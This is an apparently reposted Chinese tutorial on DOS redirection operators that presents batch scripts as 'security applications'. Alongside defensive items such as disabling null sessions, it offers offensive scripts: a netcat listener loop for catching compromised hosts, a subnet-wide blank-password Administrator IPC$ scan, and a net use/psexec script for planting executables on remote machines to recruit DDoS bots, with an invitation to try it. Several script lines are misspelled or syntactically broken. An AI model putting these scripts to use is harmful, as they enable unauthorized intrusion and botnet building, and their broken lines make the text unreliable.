主頁(yè) > 知識(shí)庫(kù) > DOS的重定向命令使用方法以及在安全方面的應(yīng)用

DOS的重定向命令使用方法以及在安全方面的應(yīng)用

熱門(mén)標(biāo)簽:蘇丹地圖標(biāo)注app 南陽(yáng)高頻外呼系統(tǒng)怎么安裝 京東辦理400電話(huà)查詢(xún) 菏澤電銷(xiāo)外呼系統(tǒng)軟件 為什么申請(qǐng)400電話(huà) 高德百度地圖標(biāo)注推廣 外呼系統(tǒng)解決電銷(xiāo)問(wèn)題 地圖標(biāo)注店鋪的收費(fèi) 貴陽(yáng)電話(huà)外呼系統(tǒng)廠(chǎng)家

大家知道,DOS下有一個(gè)不為大家所常用的命令——重定向命令,這個(gè)小東西非常有用,該命令同樣可以用于 Win9x/ME/2000/XP下,靈活的使用這個(gè)命令可以給我們帶來(lái)很大的方便——無(wú)論是入侵還是防守抑或是系統(tǒng)應(yīng)用,都會(huì)帶來(lái)很大的便利。今天就讓 我們來(lái)看幾個(gè)重定向命令在安全方面的應(yīng)用實(shí)例。

一、命令格式

DOS的標(biāo)準(zhǔn)輸入輸出通常是在標(biāo)準(zhǔn)設(shè)備鍵盤(pán)和顯示器上進(jìn)行的,利用重定向,可以方便地將輸入輸出改向磁盤(pán)文件或其它設(shè)備。其中:

(1).大于號(hào)“>”將命令發(fā)送到文件或設(shè)備,例如打印機(jī)>prn。使用大于號(hào)“>”時(shí),有些命令輸出(例如錯(cuò)誤消息)不能重定向。

(2).雙大于號(hào)“>>”將命令輸出添加到文件結(jié)尾而不刪除文件中已有的信息。

(3).小于號(hào)“”從文件而不是鍵盤(pán)上獲取命令所需的輸入。

(4).>符號(hào)將輸出從一個(gè)默認(rèn)I/O流(stdout,stdin,stderr)重新定向到另一個(gè)默認(rèn)I/O流。

例如,command >output_file 2>1將處理command過(guò)程中的所有錯(cuò)誤信息從屏幕重定向到標(biāo)準(zhǔn)文件輸出中。標(biāo)準(zhǔn)輸出的數(shù)值如下所示:

標(biāo)準(zhǔn)輸出 等價(jià)的數(shù)值

Stdin 0
Stdout 1
Stderr 2

其中,(1)和(2)都創(chuàng)建一個(gè)文件用于存放數(shù)據(jù);(4)可能不能夠在DOS下使用。

二、重定向命令的輸出

幾乎所有的命令均將輸出發(fā)送到屏幕。即使是將輸出發(fā)送到驅(qū)動(dòng)器或打印機(jī)的命令,也會(huì)在屏幕上顯示消息和提示。要將輸出從屏幕重定向到文件或打印機(jī),請(qǐng)使 用大于號(hào)(>)。大多數(shù)命令中均可以使用大于號(hào)。例如,在以下命令中,dir命令生成的目錄列表重定向到Dirlist.txt文件: dir>dirlist.txt,如果Dirlist.txt文件不存在,系統(tǒng)將創(chuàng)建該文件。如果Dirlist.txt存在,系統(tǒng)將使用dir命 令的輸出替換文件中的信息。

要將命令輸出添加到文件結(jié)尾而不丟失文件中的任何信息,請(qǐng)使用雙大于號(hào)(>>)。例如, 在以下命令中,dir命令生成的目錄列表附加到Dirlist.txt文件中:dir>dirlist.txt,將輸入重定向到一個(gè)命令,就象可以 將命令輸出發(fā)送到文件或打印機(jī)而不是屏幕一樣,您可以從文件而不是從鍵盤(pán)獲取命令的輸入。要從文件獲取輸入,請(qǐng)使用小于號(hào)()。例如,以下命令將 從List.txt文件中獲取sort命令的輸入:sort

三、應(yīng)用舉例

1.給注冊(cè)表加鎖/解鎖

大家知道,注冊(cè)表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVerssion\ Policies\System分支下的DWORD值“Disableregistrytools”的鍵值如為“1”,則可以給注冊(cè)表加鎖,這樣別人就無(wú) 法使用注冊(cè)表編輯器。利用重定向命令在DOS下就可以給注冊(cè)表加鎖/解鎖,非常方便。

打開(kāi)記事本程序,新建一個(gè)文本文件,輸入如下內(nèi)容:

@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>123.reg
@echo "DisableRegistryTools"=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg

另存為以.bat為擴(kuò)展名的批處理文件,點(diǎn)擊這個(gè)文件注冊(cè)表就會(huì)被鎖定!

在上面的命令中,echo是DOS下的回顯命令,在它的前面加上“@”前綴字符,表示執(zhí)行時(shí)本行在命令行或DOS里面不顯示,如果想看到程序執(zhí)行過(guò)程, 請(qǐng)將“@”去掉。大家在編寫(xiě)上述代碼時(shí)要注意的是,第一行中的“REGEDIT4”一定要用大寫(xiě)字母,在第二行中“echo”和“.”之間沒(méi)有空格。 “>>”產(chǎn)生的內(nèi)容將追加到它后面的文件中。在文件的最后一行加上deltree /y 123.reg,就可以無(wú)需確認(rèn)就刪除123.reg文件。

要想給注冊(cè)表解鎖,可以編輯這個(gè)批處理文件,只需將 "DisableRegistryTools"=dword:00000001改為"DisableRegistryTools"=dword: 00000000,其他內(nèi)容不變,保存為.bat文件,點(diǎn)擊就可以給注冊(cè)表解鎖了。

2.把登陸3389的機(jī)器IP記錄下來(lái)

把下面的內(nèi)容保存為3389IP.bat:

time /t >>log.log
netstat -n -p tcp |find ":3389">>Log.log
start Explorer

運(yùn)行3389IP.bat,然后查看log.log文件即可看到登陸3389的機(jī)器IP,是不是很方便呢?

3.恢復(fù)DOS實(shí)模式

大家知道,某些惡意網(wǎng)頁(yè)會(huì)修改瀏覽者的注冊(cè)表,在無(wú)所不用其極的各種手段中,修改注冊(cè)表使DOS實(shí)模式不可用是其中的招數(shù)之一。要想恢復(fù)DOS實(shí)模式方法有很多,用批處理和重定向命令結(jié)合使用,是比較特別的一招,在此與大家分享。

echo off
echo REGEDIT4>c:\scanreg.reg
@echo.>>lock.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]>>c:\scanreg.reg
echo "NoRealMode"=dword:00000000>>c:\scanreg.reg
regedit /s c:\scanreg.reg
@del c:\scanreg.reg

另存為以.bat為擴(kuò)展名的批處理文件,點(diǎn)擊這個(gè)文件就可以恢復(fù)DOS實(shí)模式,那些DOS應(yīng)用程序又可以使用了。

4.等待肉雞上門(mén)

每天費(fèi)時(shí)費(fèi)力的找肉雞是不是很辛苦,利用重定向命令和批處理文件就可以讓你簡(jiǎn)單的找到肉雞!方法是用記事本新建一個(gè)文本文件,輸入如下內(nèi)容:

@echo off
:start
nc -vv -w 5 -l -p 80>>rouji.log
goto start

保存為.bat文件(事先得準(zhǔn)備好一個(gè)nc.exe文件,它是網(wǎng)絡(luò)故障事件檢測(cè)軟件Netcat的主程序),然后運(yùn)行此程序之后,你就等著肉雞上門(mén)主動(dòng)來(lái)找你吧!運(yùn)氣好的話(huà),每天10個(gè)不成問(wèn)題。

5.快速進(jìn)行空連接

空連接是在沒(méi)有信任的情況下與服務(wù)器建立的會(huì)話(huà),換句話(huà)說(shuō),它是一個(gè)到服務(wù)器的匿名訪(fǎng)問(wèn)。使用命令net use \\IP\ipc""/user:""就可以簡(jiǎn)單地和目標(biāo)建立一個(gè)空連接(需要目標(biāo)開(kāi)放IPC)。利用重定向命令和for命令就可以對(duì)一個(gè)C類(lèi)網(wǎng)段進(jìn)行快速的空連接,并把結(jié)果保存到一個(gè)文件 中供你分析。方法是用記事本編輯如下內(nèi)容的文件:

@echo off
echo 格式:test *.*.*>test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt  net use \%1.%%Gipc""/use:"Administrator"|find"命令完成">>test.txt

批處理文件保存為.bat,運(yùn)行即可。這個(gè)批處理文件的功能是對(duì)你指定的一個(gè)C類(lèi)網(wǎng)段中的254個(gè)ip依次試建立帳號(hào)為administrator口令為空的ipc連接,如果成功就把結(jié)果記錄在test.txt。這樣就實(shí)現(xiàn)了NT弱口令掃描功能!其中,for命令的功能是對(duì)一組文件中的每一個(gè)文件執(zhí)行 某個(gè)特定命令,也就是可以用你指定的循環(huán)范圍生成一系列命令。For命令的格式為:FOR %variable IN (set) DO command [command-parameters],具體的含義:

%variable:指定一個(gè)單一字母可替換的參數(shù)。

(set):指定一個(gè)或一組文件??梢允褂猛ㄅ浞?/p>

command:指定對(duì)每個(gè)文件執(zhí)行的命令。

command-parameters:為特定命令指定參數(shù)或命令行開(kāi)關(guān)。

在批處理文件中使用FOR命令時(shí),指定變量請(qǐng)使用%%variable而不要用%variable。變量名稱(chēng)是區(qū)分大小寫(xiě)的,所以%i不同%I。

6.禁止空連接

空連接的存在對(duì)有一定的危險(xiǎn),所以我們還是禁止它為好!方法是輸入net share察看本地共享資源,接下來(lái)輸入如下命令刪除共享:

net share ipc/deletenetshareadmin /delete
net share c/deletenetshared /delete(如果有e,f等盤(pán)符可以同法刪除)

然后用記事本新建一個(gè)文本文件,輸入如下內(nèi)容即可:

@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA]>>123.reg
@echo "RestrictAnonymous"=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg

另存為以.bat為擴(kuò)展名的批處理文件,點(diǎn)擊這個(gè)文件就可以禁止空連接。

7.掃描所有和本機(jī)以TCP協(xié)議連接的計(jì)算機(jī)

掃描自己的計(jì)算機(jī)端口,發(fā)現(xiàn)有特殊端口打開(kāi),可以查木馬,不僅如此,利用下面這個(gè)批處理文件還可以把所有和本機(jī)以TCP協(xié)議連接的計(jì)算機(jī)IP地址都記錄下來(lái)。這個(gè).bat文件內(nèi)容如下:

data /t>>123.log
time /t>>123.log
netstat -n -p tcp 10>>123.log

這樣不僅可以記錄下對(duì)方的IP,還有時(shí)間和日期,方便自己查看。

8.自動(dòng)獲取DDoS肉雞

DDoS是Distributed Denial of Service的縮寫(xiě),意即分布式拒絕服務(wù)攻擊。它是指借助于客戶(hù)/服務(wù)器技術(shù),將多個(gè)計(jì)算機(jī)聯(lián)合起來(lái)作為攻擊平臺(tái),對(duì)一個(gè)或多個(gè)目標(biāo)發(fā)動(dòng)DoS攻擊,從 而成倍地提高拒絕服務(wù)攻擊的威力。通常,攻擊者使用一個(gè)偷竊帳號(hào)將DDoS主控程序安裝在一個(gè)計(jì)算機(jī)上,在一個(gè)設(shè)定的時(shí)間主控程序?qū)⑴c大量代理程序通訊, 代理程序已經(jīng)被安裝在Internet上的許多計(jì)算機(jī)上。代理程序收到指令時(shí)就發(fā)動(dòng)攻擊。利用客戶(hù)/服務(wù)器技術(shù),主控程序能在幾秒鐘內(nèi)激活成百上千次代理 程序的運(yùn)行。

雖然不建議大家使用DDoS方式攻擊,但作為技術(shù)掌握還是很有必要的??墒?,如何才能獲取進(jìn)行DDoS攻擊的肉雞呢?把下面的內(nèi)容保存為ok.bat文件就可以達(dá)到目的了:

@echo off
echo自動(dòng)獲取DDoS肉雞
for /f "tokens=1,3*" %i in (host.txt) do net use \\%k\ipc/user:"\sysytem32
if errorelevel 0 goto success
psexec -d \\%i c:\winnt\system32\%1
net user \\%i\ipc$ /del
:success
echo ------------------------------>>success.txt
echo 肉雞:%i>>success.txt
echo 用戶(hù)名:%j>>success.txt
echo 密碼:%k>>success.txt
echo ------------------------------>>success.txt

使用方法是ok.bat *.exe host.txt,其中host.txt的格式為:ip administrator password。好了,快試試吧。但不要用來(lái)干破壞哦。

其實(shí),本文所說(shuō)的方法主要是利用了批處理和相關(guān)的命令,重定向命令在其中只是個(gè)“傳接劑”,起連接作用,但它的功勞也是不小的,所以我們不要忘了重定向命令哦。本文只是拋磚引玉,希望大家暢所欲言,多多指點(diǎn)。在寫(xiě)作時(shí)參閱過(guò)眾多高手的論壇帖子,多謝各位。

您可能感興趣的文章:
  • dos 內(nèi)容重定向符 > 和 >>
  • dos 內(nèi)容重定向
  • Windows cmd命令行輸入輸出重定向問(wèn)題

標(biāo)簽:韶關(guān) 阿里 通遼 昌都 資陽(yáng) 咸寧 滄州 海北

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《DOS的重定向命令使用方法以及在安全方面的應(yīng)用》,本文關(guān)鍵詞  DOS,的,重定向,命令,使用方法,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《DOS的重定向命令使用方法以及在安全方面的應(yīng)用》相關(guān)的同類(lèi)信息!
  • 本頁(yè)收集關(guān)于DOS的重定向命令使用方法以及在安全方面的應(yīng)用的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章